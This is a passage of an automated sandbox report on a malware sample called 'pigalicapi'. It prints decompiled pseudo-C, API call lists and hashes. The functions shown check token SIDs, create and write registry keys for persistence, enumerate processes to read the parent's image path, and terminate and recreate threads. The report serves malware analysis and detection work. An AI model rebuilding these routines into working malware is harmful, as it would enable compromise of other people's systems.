                                                                                                                                                                                                                                                                                          • EqualSid.ADVAPI32(?,00000000), ref: 04009AC3
                                                                                                                                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,00000044), ref: 04009AE6
                                                                                                                                                                                                                                                                                          • EqualSid.ADVAPI32(?), ref: 04009AFC
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04009B7A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Token$CreateEqualInformationKnownProcessWell$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                                                          • API String ID: 98007406-2746444292
                                                                                                                                                                                                                                                                                          • Opcode ID: 9acdad6d6c89bf527d7a7d290df755143e04e7f41d5340071806561b0adaf72d
                                                                                                                                                                                                                                                                                          • Instruction ID: 7ae4063a6f13a9051a7762c6ae15c07f15253da6e1139fe1377935b2c4657608
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9acdad6d6c89bf527d7a7d290df755143e04e7f41d5340071806561b0adaf72d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB41F0B5A042189BEB24DF90CC45FDAB3FDFF48700F04C1E4A549A6181DE74AA81DFA1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04005A00(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                                                                                                          				CHAR* _t35;
                                                                                                                                                                                                                                                                                          				int _t39;
                                                                                                                                                                                                                                                                                          				long _t43;
                                                                                                                                                                                                                                                                                          				CHAR* _t51;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0x10) {
                                                                                                                                                                                                                                                                                          					E04007D20(_t27, "Mvqcsgcuwwini", 0, 0xe);
                                                                                                                                                                                                                                                                                          					lstrcpyA("Mvqcsgcuwwini", "WDefault");
                                                                                                                                                                                                                                                                                          					_t33 = E04005930(_a4 + 0x45b, "Mvqcsgcuwwini", 0xd); // executed
                                                                                                                                                                                                                                                                                          					E04007D20(_t33, _a8, 0, _a12);
                                                                                                                                                                                                                                                                                          					_t35 =  *0x401189c; // 0x400c4e0
                                                                                                                                                                                                                                                                                          					if(lstrlenA(_t35) < _a12) {
                                                                                                                                                                                                                                                                                          						_t51 =  *0x401189c; // 0x400c4e0
                                                                                                                                                                                                                                                                                          						lstrcpyA(_a8, _t51);
                                                                                                                                                                                                                                                                                          						_t39 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                                          						if(_t39 + lstrlenA(?str?) < _a12) {
                                                                                                                                                                                                                                                                                          							lstrcatA(_a8, "Mvqcsgcuwwini");
                                                                                                                                                                                                                                                                                          							_v12 = 0x80000001;
                                                                                                                                                                                                                                                                                          							_v16 = 0;
                                                                                                                                                                                                                                                                                          							_v20 = 0;
                                                                                                                                                                                                                                                                                          							_t43 = RegCreateKeyExA(_v12, _a8, 0, 0, 0, 0x20006, 0,  &_v16,  &_v20); // executed
                                                                                                                                                                                                                                                                                          							if(_t43 != 0) {
                                                                                                                                                                                                                                                                                          								E04007D20(_t43, _a8, 0, _a12);
                                                                                                                                                                                                                                                                                          								lstrcpyA(_a8, "software\\microsoft\\windows\\currentversion\\uninstall");
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v8 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                                          0x04005a07
                                                                                                                                                                                                                                                                                          0x04005a12
                                                                                                                                                                                                                                                                                          0x04005a35
                                                                                                                                                                                                                                                                                          0x04005a47
                                                                                                                                                                                                                                                                                          0x04005a5d
                                                                                                                                                                                                                                                                                          0x04005a6f
                                                                                                                                                                                                                                                                                          0x04005a77
                                                                                                                                                                                                                                                                                          0x04005a86
                                                                                                                                                                                                                                                                                          0x04005a8c
                                                                                                                                                                                                                                                                                          0x04005a97
                                                                                                                                                                                                                                                                                          0x04005aa1
                                                                                                                                                                                                                                                                                          0x04005ab9
                                                                                                                                                                                                                                                                                          0x04005ac8
                                                                                                                                                                                                                                                                                          0x04005ace
                                                                                                                                                                                                                                                                                          0x04005ad5
                                                                                                                                                                                                                                                                                          0x04005adc
                                                                                                                                                                                                                                                                                          0x04005b00
                                                                                                                                                                                                                                                                                          0x04005b08
                                                                                                                                                                                                                                                                                          0x04005b20
                                                                                                                                                                                                                                                                                          0x04005b31
                                                                                                                                                                                                                                                                                          0x04005b0a
                                                                                                                                                                                                                                                                                          0x04005b0e
                                                                                                                                                                                                                                                                                          0x04005b0e
                                                                                                                                                                                                                                                                                          0x04005b41
                                                                                                                                                                                                                                                                                          0x04005b41
                                                                                                                                                                                                                                                                                          0x04005ab9
                                                                                                                                                                                                                                                                                          0x04005a86
                                                                                                                                                                                                                                                                                          0x04005b4b

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(Mvqcsgcuwwini,WDefault), ref: 04005A47
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005930: CharUpperA.USER32(00000000), ref: 040059E2
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(0400C4E0), ref: 04005A7D
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,0400C4E0), ref: 04005A97
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005AA1
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Mvqcsgcuwwini), ref: 04005AAE
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Mvqcsgcuwwini), ref: 04005AC8
                                                                                                                                                                                                                                                                                          • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 04005B00
                                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 04005B0E
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,software\microsoft\windows\currentversion\uninstall), ref: 04005B31
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005B3B
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$CharCloseCreateUpperlstrcat
                                                                                                                                                                                                                                                                                          • String ID: Mvqcsgcuwwini$WDefault$software\microsoft\windows\currentversion\uninstall
                                                                                                                                                                                                                                                                                          • API String ID: 4161867159-611550020
                                                                                                                                                                                                                                                                                          • Opcode ID: 6328766250843c22953127ee7e5734f8e2de0c08094b4a1cb46197edb91ced3c
                                                                                                                                                                                                                                                                                          • Instruction ID: 2f1465acc8a4d9a659e2af8a658b36752d7f83b1b7b92a7dc582af9786930c23
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6328766250843c22953127ee7e5734f8e2de0c08094b4a1cb46197edb91ced3c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40310775600208FBEB14DFA4DC49FAA37B9EB44708F04C615FA15BB281D7B8AA50CF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                                                                                                                          			E04001CA0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                                          				char _v272;
                                                                                                                                                                                                                                                                                          				long _v284;
                                                                                                                                                                                                                                                                                          				intOrPtr _v300;
                                                                                                                                                                                                                                                                                          				void* _v308;
                                                                                                                                                                                                                                                                                          				void* _v312;
                                                                                                                                                                                                                                                                                          				long _v316;
                                                                                                                                                                                                                                                                                          				long _v320;
                                                                                                                                                                                                                                                                                          				void* _v324;
                                                                                                                                                                                                                                                                                          				char _v328;
                                                                                                                                                                                                                                                                                          				int _v332;
                                                                                                                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                                                                                                                          				int _t47;
                                                                                                                                                                                                                                                                                          				int _t50;
                                                                                                                                                                                                                                                                                          				void* _t61;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                                          				_t44 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                                                                                                                                                          				_v312 = _t44;
                                                                                                                                                                                                                                                                                          				if(_v312 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          					L18:
                                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v308 = 0x128;
                                                                                                                                                                                                                                                                                          				_t47 = Process32First(_v312,  &_v308); // executed
                                                                                                                                                                                                                                                                                          				if(_t47 == 0) {
                                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                                          					CloseHandle(_v312);
                                                                                                                                                                                                                                                                                          					goto L18;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v320 = GetCurrentProcessId();
                                                                                                                                                                                                                                                                                          				_v316 = 0;
                                                                                                                                                                                                                                                                                          				while(_v300 != _v320) {
                                                                                                                                                                                                                                                                                          					_t50 = Process32Next(_v312,  &_v308); // executed
                                                                                                                                                                                                                                                                                          					if(_t50 != 0) {
                                                                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                                                                                          					if(_v316 != 0 && Process32First(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                                          						while(_v300 != _v316) {
                                                                                                                                                                                                                                                                                          							if(Process32Next(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(lstrlenA( &_v272) < _a8) {
                                                                                                                                                                                                                                                                                          							lstrcpyA(_a4,  &_v272);
                                                                                                                                                                                                                                                                                          							_v324 = OpenProcess(0x410, 0, _v316);
                                                                                                                                                                                                                                                                                          							if(_v324 != 0) {
                                                                                                                                                                                                                                                                                          								_v332 = 0;
                                                                                                                                                                                                                                                                                          								_push( &_v332);
                                                                                                                                                                                                                                                                                          								_push(4);
                                                                                                                                                                                                                                                                                          								_push( &_v328);
                                                                                                                                                                                                                                                                                          								_t61 = _v324;
                                                                                                                                                                                                                                                                                          								_push(_t61); // executed
                                                                                                                                                                                                                                                                                          								L0400B1D4(); // executed
                                                                                                                                                                                                                                                                                          								if(_t61 == 0) {
                                                                                                                                                                                                                                                                                          									_push(_a8);
                                                                                                                                                                                                                                                                                          									_push(_a4);
                                                                                                                                                                                                                                                                                          									_push(_v324); // executed
                                                                                                                                                                                                                                                                                          									L0400B1C8(); // executed
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_push(_a8);
                                                                                                                                                                                                                                                                                          									_push(_a4);
                                                                                                                                                                                                                                                                                          									_push(_v328);
                                                                                                                                                                                                                                                                                          									_push(_v324);
                                                                                                                                                                                                                                                                                          									L0400B1CE();
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v5 = 1;
                                                                                                                                                                                                                                                                                          								FindCloseChangeNotification(_v324); // executed
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v316 = _v284;
                                                                                                                                                                                                                                                                                          				goto L6;
                                                                                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                                                                                          0x04001ca9
                                                                                                                                                                                                                                                                                          0x04001cb1
                                                                                                                                                                                                                                                                                          0x04001cb6
                                                                                                                                                                                                                                                                                          0x04001cc3
                                                                                                                                                                                                                                                                                          0x04001e51
                                                                                                                                                                                                                                                                                          0x04001e57
                                                                                                                                                                                                                                                                                          0x04001e57
                                                                                                                                                                                                                                                                                          0x04001cc9
                                                                                                                                                                                                                                                                                          0x04001ce1
                                                                                                                                                                                                                                                                                          0x04001ce8
                                                                                                                                                                                                                                                                                          0x04001e44
                                                                                                                                                                                                                                                                                          0x04001e4b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001e4b
                                                                                                                                                                                                                                                                                          0x04001cf4
                                                                                                                                                                                                                                                                                          0x04001cfa
                                                                                                                                                                                                                                                                                          0x04001d04
                                                                                                                                                                                                                                                                                          0x04001d2e
                                                                                                                                                                                                                                                                                          0x04001d35
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001d37
                                                                                                                                                                                                                                                                                          0x04001d3e
                                                                                                                                                                                                                                                                                          0x04001d5f
                                                                                                                                                                                                                                                                                          0x04001e3e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001e3e
                                                                                                                                                                                                                                                                                          0x04001d81
                                                                                                                                                                                                                                                                                          0x04001d92
                                                                                                                                                                                                                                                                                          0x04001dac
                                                                                                                                                                                                                                                                                          0x04001db9
                                                                                                                                                                                                                                                                                          0x04001dbb
                                                                                                                                                                                                                                                                                          0x04001dcb
                                                                                                                                                                                                                                                                                          0x04001dcc
                                                                                                                                                                                                                                                                                          0x04001dd4
                                                                                                                                                                                                                                                                                          0x04001dd5
                                                                                                                                                                                                                                                                                          0x04001ddb
                                                                                                                                                                                                                                                                                          0x04001ddc
                                                                                                                                                                                                                                                                                          0x04001de3
                                                                                                                                                                                                                                                                                          0x04001e05
                                                                                                                                                                                                                                                                                          0x04001e09
                                                                                                                                                                                                                                                                                          0x04001e10
                                                                                                                                                                                                                                                                                          0x04001e11
                                                                                                                                                                                                                                                                                          0x04001de5
                                                                                                                                                                                                                                                                                          0x04001de8
                                                                                                                                                                                                                                                                                          0x04001dec
                                                                                                                                                                                                                                                                                          0x04001df3
                                                                                                                                                                                                                                                                                          0x04001dfa
                                                                                                                                                                                                                                                                                          0x04001dfb
                                                                                                                                                                                                                                                                                          0x04001dfb
                                                                                                                                                                                                                                                                                          0x04001e16
                                                                                                                                                                                                                                                                                          0x04001e21
                                                                                                                                                                                                                                                                                          0x04001e21
                                                                                                                                                                                                                                                                                          0x04001db9
                                                                                                                                                                                                                                                                                          0x04001e27
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001d3e
                                                                                                                                                                                                                                                                                          0x04001d18
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04001CB1
                                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(000000FF,00000128), ref: 04001CE1
                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 04001CEE
                                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32 ref: 04001D2E
                                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(000000FF,00000128), ref: 04001D52
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 04001D78
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-00000204,?), ref: 04001D92
                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 04001DA6
                                                                                                                                                                                                                                                                                          • EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 04001DDC
                                                                                                                                                                                                                                                                                          • GetModuleFileNameExA.PSAPI(00000000,?,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001DFB
                                                                                                                                                                                                                                                                                          • GetProcessImageFileNameA.PSAPI(00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E11
                                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E21
                                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32 ref: 04001E37
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 04001E4B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ProcessProcess32$CloseFileFirstNameNext$ChangeCreateCurrentEnumFindHandleImageModuleModulesNotificationOpenSnapshotToolhelp32lstrcpylstrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 384183238-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f968c283a4d19645c33466bb1cdde0a0755c48e1b5ee604f6c84b8f5c7af64fd
                                                                                                                                                                                                                                                                                          • Instruction ID: c9fd9719e36fb5edb768dae97ebace1d15885c7ece39cbb3db7519296d7591e9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f968c283a4d19645c33466bb1cdde0a0755c48e1b5ee604f6c84b8f5c7af64fd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9641DC719002189BEB65DF94CD84BEDB7B9AB48304F0086D8E60DB6180DB75BE84CF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04005F30() {
                                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                                          				signed int _v9;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				char _v284;
                                                                                                                                                                                                                                                                                          				int _v288;
                                                                                                                                                                                                                                                                                          				int _v292;
                                                                                                                                                                                                                                                                                          				char _v324;
                                                                                                                                                                                                                                                                                          				int _v328;
                                                                                                                                                                                                                                                                                          				char* _t27;
                                                                                                                                                                                                                                                                                          				CHAR* _t30;
                                                                                                                                                                                                                                                                                          				long _t33;
                                                                                                                                                                                                                                                                                          				long _t37;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v9 = 0;
                                                                                                                                                                                                                                                                                          				_t27 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                          				_v8 = _t27;
                                                                                                                                                                                                                                                                                          				E04007D20(_t27,  &_v284, 0, 0x104);
                                                                                                                                                                                                                                                                                          				lstrcpyA( &_v284, "pigalicapi");
                                                                                                                                                                                                                                                                                          				_t30 =  *0x4011898; // 0x4013fe2
                                                                                                                                                                                                                                                                                          				lstrcatA( &_v284, _t30);
                                                                                                                                                                                                                                                                                          				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                                          				_t33 = RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20); // executed
                                                                                                                                                                                                                                                                                          				if(_t33 == 0) {
                                                                                                                                                                                                                                                                                          					_v292 = 0x20;
                                                                                                                                                                                                                                                                                          					_v288 = 0x20;
                                                                                                                                                                                                                                                                                          					_t37 = RegQueryValueExA(_v20,  &_v284, 0, 0,  &_v324,  &_v288); // executed
                                                                                                                                                                                                                                                                                          					if(_t37 == 0) {
                                                                                                                                                                                                                                                                                          						_v9 = 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t47 = _v9 & 0x000000ff;
                                                                                                                                                                                                                                                                                          					if((_v9 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          						_v328 = 0x10;
                                                                                                                                                                                                                                                                                          						E04009BD0(_t47,  &_v324, 0x10);
                                                                                                                                                                                                                                                                                          						RegSetValueExA(_v20,  &_v284, 0, 3,  &_v324, 0x10);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					RegCloseKey(_v20);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v9;
                                                                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                                                                          0x04005f39
                                                                                                                                                                                                                                                                                          0x04005f3d
                                                                                                                                                                                                                                                                                          0x04005f42
                                                                                                                                                                                                                                                                                          0x04005f53
                                                                                                                                                                                                                                                                                          0x04005f67
                                                                                                                                                                                                                                                                                          0x04005f6d
                                                                                                                                                                                                                                                                                          0x04005f7a
                                                                                                                                                                                                                                                                                          0x04005f80
                                                                                                                                                                                                                                                                                          0x04005f90
                                                                                                                                                                                                                                                                                          0x04005f92
                                                                                                                                                                                                                                                                                          0x04005f92
                                                                                                                                                                                                                                                                                          0x04005f99
                                                                                                                                                                                                                                                                                          0x04005fb3
                                                                                                                                                                                                                                                                                          0x04005fbb
                                                                                                                                                                                                                                                                                          0x04005fc1
                                                                                                                                                                                                                                                                                          0x04005fcb
                                                                                                                                                                                                                                                                                          0x04005ff2
                                                                                                                                                                                                                                                                                          0x04005ffa
                                                                                                                                                                                                                                                                                          0x04005ffc
                                                                                                                                                                                                                                                                                          0x04005ffc
                                                                                                                                                                                                                                                                                          0x04006000
                                                                                                                                                                                                                                                                                          0x04006006
                                                                                                                                                                                                                                                                                          0x04006008
                                                                                                                                                                                                                                                                                          0x0400601b
                                                                                                                                                                                                                                                                                          0x0400603b
                                                                                                                                                                                                                                                                                          0x0400603b
                                                                                                                                                                                                                                                                                          0x04006045
                                                                                                                                                                                                                                                                                          0x04006045
                                                                                                                                                                                                                                                                                          0x04006051

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,pigalicapi), ref: 04005F67
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,04013FE2), ref: 04005F7A
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,04003C58,00000000,000F003F,00000000), ref: 04005FB3
                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005FF2
                                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 0400603B
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04006045
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$CloseOpenQuerylstrcatlstrcpy
                                                                                                                                                                                                                                                                                          • String ID: $ $pigalicapi
                                                                                                                                                                                                                                                                                          • API String ID: 764223185-550099112
                                                                                                                                                                                                                                                                                          • Opcode ID: 423ae5761b421ea40ff2c1466760ba86f39da5aff24a2289ecb93b8c70e41592
                                                                                                                                                                                                                                                                                          • Instruction ID: d868066335aa3bc34e1d01a835705104c70e08da6b50357c6a08ba3ec109f492
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 423ae5761b421ea40ff2c1466760ba86f39da5aff24a2289ecb93b8c70e41592
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F3143B194021CABEB14CF90DC45FFEB7B8EB08704F048598EB04B6181D7B96A85CF60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04004096() {
                                                                                                                                                                                                                                                                                          				void _t92;
                                                                                                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                                                                                                          				void* _t161;
                                                                                                                                                                                                                                                                                          				void* _t163;
                                                                                                                                                                                                                                                                                          				void* _t166;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				L0:
                                                                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                                                                          					L0:
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t161 - 0x38)) =  *((intOrPtr*)(_t161 - 0x38)) + 1;
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t161 - 0x38)) >=  *((intOrPtr*)(_t161 + 0x14))) {
                                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                                          					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                          					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                                          						VirtualFree( *(_t161 - 0x30), 0, 0x8000);
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t171 =  *(_t161 - 0x34);
                                                                                                                                                                                                                                                                                          					if( *(_t161 - 0x34) != 0) {
                                                                                                                                                                                                                                                                                          						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x34) = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					ResetEvent( *(_t161 - 0x10));
                                                                                                                                                                                                                                                                                          					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                          					_t92 = CreateThread(0, 0, E04004AC0, _t161 - 0x34, 0, 0); // executed
